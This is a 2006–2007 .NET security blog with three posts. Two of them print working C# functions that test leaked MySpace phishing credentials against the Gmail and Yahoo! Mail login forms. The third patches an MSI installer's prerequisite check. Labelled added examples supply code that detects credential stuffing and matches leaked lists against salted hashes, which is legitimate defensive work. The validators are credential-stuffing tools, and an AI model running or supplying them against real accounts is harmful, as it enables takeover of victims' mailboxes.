If at first you don't succeed; call it version 1.0
Friday, 26 January 2007

Almost two weeks after I sent the first mails, and after sending two more follow-up mails asking whether there were any updates regarding this issue, I have received only one more response, from Google.
Google's response was somewhat vague:


Hello,
Thanks for your report. We apologize for any inconvenience this may have caused.
When we are notified of such issues, we investigate and take appropriate action if we find that the Gmail Terms of Use have been violated. To read the Gmail Terms of Use, please visit:
http://mail.google.com/gmail/help/terms_of_use.html.
We appreciate your concern, and thank you for taking the time to send us your comments.
Sincerely,
The Google Team


From Gmail’s terms of use: “…Before you register for your Gmail account, you must read and agree to these Gmail Terms of Use and the following terms and conditions and policies, including any future amendments…”.

I’m not an attorney and I didn’t go to law school, but as far as I can understand from the first line, these “terms of use” apply only to registered Gmail users. So, if an attacker brute-forces the MySpace phishing list, finds a valid Gmail username/password and uses it, he will not be violating these terms, because he has not registered that account and therefore never had to read or agree to them. I’ve sent this comment to Google.

I'm still waiting for a response from Yahoo and Microsoft.
Again, to demonstrate how easy it is to extract a valid username/password from the phishers' list, the following is a modified version of the Gmail account validator, this time for Yahoo! Mail:

using System;
using System.IO;
using System.Net;
using System.Text;

// Returns 1 if valid username/password, 0 if invalid, -1 if unknown.
// Note: this is a scraping check against the 2007 Yahoo! login form. It relies on the
// response markers below and breaks whenever the form or its error messages change.
private static int IsValidYahooMailLogin(string username, string password)
{
   HttpWebRequest request = (HttpWebRequest)WebRequest.Create("https://login.yahoo.com/config/login?");
   request.CookieContainer = new CookieContainer();   // keep any session cookies the login sets
   request.Method = "POST";
   request.Referer = "https://login.yahoo.com/config/login?";
   request.ContentType = "application/x-www-form-urlencoded";
   // Hidden fields copied from the login form; only login/passwd vary per attempt.
   // The credentials are percent-encoded so that '&', '+' or '%' in a password cannot break the body.
   string data = ".tries=2&.src=ym&.md5=&.hash=&.js=&.last=&promo=&.intl=us&.bypass=&" +
      ".partner=&.u=chn9vfp2qnpl1&.v=0&.challenge=&.yplus=&.emailCode=&pkg=" +
      "&stepid=&.ev=&hasMsgr=1&.chkP=Y&.done=http%3A%2F%2Fmail.yahoo.com&.pd=ym_ver%253d0&login=" +
      Uri.EscapeDataString(username) + "&passwd=" + Uri.EscapeDataString(password) + "&.save=Sign+In";
   byte[] body = Encoding.ASCII.GetBytes(data);
   request.ContentLength = body.Length;             // length in bytes, not characters
   using (Stream reqStream = request.GetRequestStream())
      reqStream.Write(body, 0, body.Length);
   string resp;
   try
   {
      using (HttpWebResponse response = (HttpWebResponse)request.GetResponse())
      using (StreamReader sr = new StreamReader(response.GetResponseStream()))
         resp = sr.ReadToEnd();
   }
   catch (WebException)
   {
      return -1;   // network error or non-2xx status: outcome unknown
   }
   // A successful login answers with a JavaScript redirect; a failure re-renders the form with an error text.
   if (resp.IndexOf("location.replace") > -1) return 1;
   if (resp.IndexOf("Invalid ID or password.") > -1 || resp.IndexOf("This ID is not yet taken.") > -1) return 0;
   return -1;
}
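What a run of either validator looks like from the provider's side, as an added example that is not code from the original post: one client address posts the whole list, so the authentication log shows one source, many distinct usernames and a high failure ratio. The log format, the sample lines, the source addresses and the thresholds below are all constructed for this example and do not come from any vendor.

```csharp
using System;
using System.Collections.Generic;

// Added example: flag credential-stuffing sources in a webmail provider's authentication log.
// Log format and all sample lines are constructed (hypothetical, not any vendor's real format):
//   "<ISO timestamp> <client IP> <username> <OK|FAIL>"
public static class CredentialStuffingDetector
{
    public static readonly string[] SampleAuthLog =
    {
        // One client working through a leaked list: every attempt is a different account.
        "2007-01-26T10:00:01Z 198.51.100.7 alice@example.com FAIL",
        "2007-01-26T10:00:02Z 198.51.100.7 bob@example.com FAIL",
        "2007-01-26T10:00:03Z 198.51.100.7 carol@example.com OK",
        "2007-01-26T10:00:04Z 198.51.100.7 dave@example.com FAIL",
        "2007-01-26T10:00:05Z 198.51.100.7 erin@example.com FAIL",
        "2007-01-26T10:00:06Z 198.51.100.7 frank@example.com FAIL",
        "2007-01-26T10:00:07Z 198.51.100.7 grace@example.com OK",
        "2007-01-26T10:00:08Z 198.51.100.7 heidi@example.com FAIL",
        "2007-01-26T10:00:09Z 198.51.100.7 ivan@example.com FAIL",
        "2007-01-26T10:00:10Z 198.51.100.7 judy@example.com FAIL",
        // A legitimate user mistyping a password: one account, few attempts.
        "2007-01-26T10:05:00Z 203.0.113.9 alice@example.com FAIL",
        "2007-01-26T10:05:10Z 203.0.113.9 alice@example.com FAIL",
        "2007-01-26T10:05:20Z 203.0.113.9 alice@example.com OK",
        // A shared office NAT: several accounts, mostly successful logins.
        "2007-01-26T10:06:00Z 192.0.2.44 bob@example.com OK",
        "2007-01-26T10:06:05Z 192.0.2.44 carol@example.com OK",
        "2007-01-26T10:06:09Z 192.0.2.44 dave@example.com FAIL",
        "2007-01-26T10:06:15Z 192.0.2.44 dave@example.com OK",
    };

    public sealed class SourceStats
    {
        public readonly HashSet<string> Users = new HashSet<string>(StringComparer.OrdinalIgnoreCase);
        public int Attempts;
        public int Failures;
        public double FailureRatio { get { return Attempts == 0 ? 0.0 : (double)Failures / Attempts; } }
    }

    // Aggregate attempts per client address. Malformed lines are skipped rather than trusted.
    public static Dictionary<string, SourceStats> Aggregate(IEnumerable<string> lines)
    {
        var perSource = new Dictionary<string, SourceStats>();
        foreach (string line in lines)
        {
            string[] f = line.Split(' ');
            if (f.Length != 4) continue;
            SourceStats s;
            if (!perSource.TryGetValue(f[1], out s)) perSource[f[1]] = s = new SourceStats();
            s.Attempts++;
            s.Users.Add(f[2]);
            if (f[3] == "FAIL") s.Failures++;
        }
        return perSource;
    }

    // A source is flagged when it touched at least minDistinctUsers accounts and most attempts failed.
    // Thresholds are illustrative. A per-IP rule alone misses a run spread over many proxies, so in
    // practice it is combined with per-account and global failure-rate signals.
    public static List<string> FlagSources(IEnumerable<string> lines, int minDistinctUsers, double minFailureRatio)
    {
        var flagged = new List<string>();
        foreach (var kv in Aggregate(lines))
        {
            if (kv.Value.Users.Count >= minDistinctUsers && kv.Value.FailureRatio >= minFailureRatio)
                flagged.Add(kv.Key);
        }
        flagged.Sort();
        return flagged;
    }

    public static void Main()
    {
        foreach (string ip in FlagSources(SampleAuthLog, 5, 0.6))
            Console.WriteLine("credential-stuffing source: " + ip);
    }
}
```

With the constructed log, only 198.51.100.7 is flagged: ten distinct accounts and eight failures out of ten attempts. The mistyping user (one account) and the office NAT (three accounts, mostly successes) stay below the thresholds. The distinct-user count is the signal that separates stuffing from an ordinary brute-force attempt against a single account.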


Friday, 26 January 2007 15:15:30 UTC | Comments [0] | .NET | Security
Tuesday, 16 January 2007

Yesterday, a huge list of MySpace usernames and passwords was revealed to the public. The list was harvested by phishers.
Most of the usernames in the list are e-mail addresses at the following webmail providers: Gmail, Hotmail, Yahoo! Mail and AOL.
Some of those poor MySpace users are probably using the same password for their webmail account, and probably for other web services too (eBay, Amazon, etc.).
Trying the pairs from the phishers' list against those web services to find the valid credentials is very easy. So, I decided to first contact the webmail vendors (Google, Microsoft, Yahoo and AOL) and ask them to check the phishers' list against their own databases, in order to warn the affected users to change their passwords as soon as possible.
Over 21 hours later, only AOL has responded to my suggestion/request.
AOL's response (10 minutes after I sent the mail!):


Hi Aviv,

Thank you for the notification.  We noticed this on the Full-Disclosure list as well.  We will do everything we can to protect these users.

Thank you,

Kent L.
AOL Product Vulnerabilities


Just to demonstrate how easy it is to extract the valid username/password pairs from the phishers' list, the following is a short C# function that validates the username and password of a Gmail account:

using System;
using System.IO;
using System.Net;
using System.Text;

// Returns 1 if valid username/password, 0 if invalid, -1 if unknown.
// Note: this scrapes the 2007 Google Accounts login form. The URL and the two response
// markers below are what that form returned at the time; the check breaks when they change.
private static int IsValidGmailLogin(string username, string password)
{
   HttpWebRequest request = (HttpWebRequest)WebRequest.Create("https://www.google.com/accounts/ServiceLoginAuth");
   request.CookieContainer = new CookieContainer();   // keep the cookies the login sets
   request.Method = "POST";
   request.Referer = "https://www.google.com/accounts/ServiceLogin";
   request.ContentType = "application/x-www-form-urlencoded";
   // Form body (no leading '?': this is a POST body, not a query string). The credentials are
   // percent-encoded so that '&', '+' or '%' in a password cannot break the body.
   string data = "service=mail&Email=" + Uri.EscapeDataString(username) + "&Passwd=" + Uri.EscapeDataString(password) +
      "&rm=false&null=Sign%20in&continue=https://mail.google.com/mail?ui=html&zy=l";
   byte[] body = Encoding.ASCII.GetBytes(data);
   request.ContentLength = body.Length;             // length in bytes, not characters
   using (Stream reqStream = request.GetRequestStream())
      reqStream.Write(body, 0, body.Length);
   string resp;
   try
   {
      using (HttpWebResponse response = (HttpWebResponse)request.GetResponse())
      using (StreamReader sr = new StreamReader(response.GetResponseStream()))
         resp = sr.ReadToEnd();
   }
   catch (WebException)
   {
      return -1;   // network error or non-2xx status: outcome unknown
   }
   // A successful login answers with a JavaScript redirect; a failure re-renders the login form.
   if (resp.IndexOf("location.href") > -1) return 1;
   if (resp.IndexOf("<form action=\"LoginAuth\"") > -1) return 0;
   return -1;
}
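The vendor-side check this post asks Google, Microsoft, Yahoo and AOL to run, as an added example that is neither the post's code nor any vendor's implementation: a provider that stores salted PBKDF2 hashes can walk a leaked "username:password" list and find the users whose leaked password is also their webmail password, at a cost of one hash computation per leaked entry that belongs to one of its users, with no brute forcing and no plaintext on file. The store layout, the iteration count, the three user records and the leaked entries below are all constructed for this example.

```csharp
using System;
using System.Collections.Generic;
using System.Security.Cryptography;
using System.Text;

// Added example: match a leaked "username:password" list against a salted-hash credential store.
// Everything here (store layout, users, leaked entries, iteration count) is constructed for illustration.
public static class LeakedListMatcher
{
    const int Pbkdf2Iterations = 10000;   // illustrative; choose per current guidance and hardware
    const int SaltBytes = 16, HashBytes = 32;

    public sealed class StoredCredential
    {
        public byte[] Salt;
        public byte[] Hash;
    }

    // Enrollment: per-user random salt, PBKDF2 (Rfc2898DeriveBytes, HMAC-SHA1 in this constructor) over the password.
    public static StoredCredential Enroll(string password)
    {
        var cred = new StoredCredential { Salt = new byte[SaltBytes] };
        using (var rng = RandomNumberGenerator.Create()) rng.GetBytes(cred.Salt);
        using (var kdf = new Rfc2898DeriveBytes(password, cred.Salt, Pbkdf2Iterations))
            cred.Hash = kdf.GetBytes(HashBytes);
        return cred;
    }

    // Verification with a fixed-time comparison: the loop never exits early on the first mismatching byte.
    public static bool Verify(string password, StoredCredential cred)
    {
        byte[] candidate;
        using (var kdf = new Rfc2898DeriveBytes(password, cred.Salt, Pbkdf2Iterations))
            candidate = kdf.GetBytes(HashBytes);
        int diff = candidate.Length ^ cred.Hash.Length;
        for (int i = 0; i < candidate.Length && i < cred.Hash.Length; i++) diff |= candidate[i] ^ cred.Hash[i];
        return diff == 0;
    }

    // Walk the leaked lines and return the accounts whose leaked password matches the one stored here.
    // Those are the users to force-reset and notify; everyone else on the list costs nothing.
    public static List<string> FindReusedPasswords(IEnumerable<string> leakedLines, IDictionary<string, StoredCredential> store)
    {
        var reused = new List<string>();
        foreach (string line in leakedLines)
        {
            int sep = line.IndexOf(':');
            if (sep <= 0) continue;                            // malformed entry: skip, never guess
            string user = line.Substring(0, sep).Trim().ToLowerInvariant();
            string pass = line.Substring(sep + 1);             // split on the first ':' only; passwords may contain ':'
            StoredCredential cred;
            if (!store.TryGetValue(user, out cred)) continue;  // not our user: nothing to check
            if (Verify(pass, cred)) reused.Add(user);
        }
        return reused;
    }

    public static void Main()
    {
        // Constructed credential store and constructed leaked list in the "username:password" shape of the dump.
        var store = new Dictionary<string, StoredCredential>
        {
            { "alice@example.com", Enroll("summer06") },     // same password as on the leaked list: flagged
            { "bob@example.com",   Enroll("Tr0ub4dor&3") },  // different password: not flagged
            { "carol@example.com", Enroll("pa:ss:word") },   // password containing ':' is parsed correctly
        };
        string[] leaked =
        {
            "alice@example.com:summer06",
            "bob@example.com:letmein",
            "carol@example.com:pa:ss:word",
            "dave@other.test:qwerty",          // not our user
            "garbage-line-without-separator",
        };
        foreach (string user in FindReusedPasswords(leaked, store))
            Console.WriteLine("force password reset + notify: " + user);
    }
}
```

With the constructed data, alice and carol are reported and bob is not; dave is skipped without any hashing because he is not a user of this store, and the malformed line is ignored. A provider could notify bob as well, since his address appearing in a phishing dump is itself a signal, but only the matched accounts are the ones an attacker can log into right now.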


Tuesday, 16 January 2007 19:04:06 UTC | Comments [1] | .NET | Security
Tuesday, 06 June 2006

After I installed the new beta 2 release of MS Office 2007, I encountered a problem creating new VSTO (Visual Studio Tools for Office) 2005 projects.

The first Google search result for VSTO 2007 was this post, which encouraged me to download the VSTO 2007 (v3) June CTP.

Unfortunately, for some unknown reason, this VSTO 2007 CTP requires the WinFX February CTP to be installed.

As I had already installed the new beta 2 release of WinFX, and I didn't want to roll back to the old February CTP, I decided to hack the VSTO 2007 installer:

  1. I extracted the provided EXE file (a self-extracting zip archive). One of the extracted files was the MSI installer.
  2. I opened the MSI file in ORCA and searched for 'WinFX'.
  3. I found that the installer checks whether the 'InstallSuccess' registry value exists under the 'SOFTWARE\Microsoft\WinFX RunTime\3.0\Setup\Indigo' registry key. But in WinFX beta 2 the path was changed to 'SOFTWARE\Microsoft\WinFX RunTime\3.0\Setup\Windows Communication Foundation'. So I edited the value in the MSI and saved it.

The installation went without any problem, and I was able to create new VSTO projects in Visual Studio 2005.

The hacked version of the VSTO 2007 (v3) June CTP can be found here: vsto3ctp.zip (1.34 MB)

Disclaimer: You may download and use the hacked version at your own risk.
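The same edit done programmatically instead of by hand in ORCA, as an added example that is not code from the original post: an MSI registry check of this kind lives in the RegLocator table (AppSearch evaluates it, and the LaunchCondition tests the resulting property), so retargeting the key is one UPDATE against that table. The example uses the WiX Deployment Tools Foundation wrapper (Microsoft.Deployment.WindowsInstaller.dll, shipped with the WiX v3 toolset), which is assumed to be referenced; the MSI file name is an assumption, while the two key strings and the 'InstallSuccess' value name are the ones from the post. One caveat worth stating for anyone who downloads a patched installer: any Authenticode signature the original MSI carried no longer verifies once its bytes are changed, so a redistributed edited MSI is, to Windows and to the person installing it, an unsigned binary from a third party.

```csharp
using System;
using Microsoft.Deployment.WindowsInstaller;   // WiX Deployment Tools Foundation (DTF), assumed to be referenced

// Added example: retarget an MSI's registry-based prerequisite check in the RegLocator table.
public static class MsiRegLocatorPatcher
{
    // Key strings exactly as the post gives them; the value the installer checks for is 'InstallSuccess'.
    const string OldKey = @"SOFTWARE\Microsoft\WinFX RunTime\3.0\Setup\Indigo";
    const string NewKey = @"SOFTWARE\Microsoft\WinFX RunTime\3.0\Setup\Windows Communication Foundation";
    const string ValueName = "InstallSuccess";

    // List every registry search the installer performs, so the row to change is identified by what it
    // actually reads rather than by a text search for 'WinFX'. Root 2 is HKEY_LOCAL_MACHINE in this table.
    public static void DumpRegLocator(Database db)
    {
        using (View view = db.OpenView("SELECT `Signature_`, `Root`, `Key`, `Name` FROM `RegLocator`"))
        {
            view.Execute();
            foreach (Record rec in view)
                using (rec)
                    Console.WriteLine("{0}: root={1} key={2} name={3}",
                        rec.GetString(1), rec.GetInteger(2), rec.GetString(3), rec.GetString(4));
        }
    }

    // Rows pointing at a given key/value. MSI SQL has no COUNT(), so the rows are fetched and counted.
    public static int CountRows(Database db, string key)
    {
        int n = 0;
        using (View view = db.OpenView("SELECT `Signature_` FROM `RegLocator` WHERE `Key` = '" + key +
                                       "' AND `Name` = '" + ValueName + "'"))
        {
            view.Execute();
            foreach (Record rec in view) using (rec) n++;
        }
        return n;
    }

    // Retarget the check inside a transaction and return how many rows were changed.
    // The key constants contain no quote characters, so plain string literals are safe in the MSI SQL here.
    public static int RetargetWinFxCheck(string msiPath)
    {
        using (Database db = new Database(msiPath, DatabaseOpenMode.Transact))
        {
            DumpRegLocator(db);
            int before = CountRows(db, OldKey);
            db.Execute("UPDATE `RegLocator` SET `Key` = '" + NewKey + "' WHERE `Key` = '" + OldKey +
                       "' AND `Name` = '" + ValueName + "'");
            db.Commit();
            return before - CountRows(db, OldKey);
        }
    }

    public static void Main(string[] args)
    {
        // The file name is an assumption: the MSI extracted from the CTP's self-extracting EXE in step 1.
        string msi = args.Length > 0 ? args[0] : "vsto3ctp.msi";
        Console.WriteLine("rows retargeted: " + RetargetWinFxCheck(msi));
    }
}
```

Opening the database in Transact mode means nothing is written unless Commit() runs, so a wrong UPDATE can be abandoned by simply disposing the Database. Dumping the table first also shows whether the same key is read by more than one signature, which a search for 'WinFX' in ORCA does not make obvious.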


Tuesday, 06 June 2006 08:50:41 UTC | Comments [1] | .NET
Disclaimer
The opinions expressed herein are my own personal opinions and do not represent my employer's view in anyway.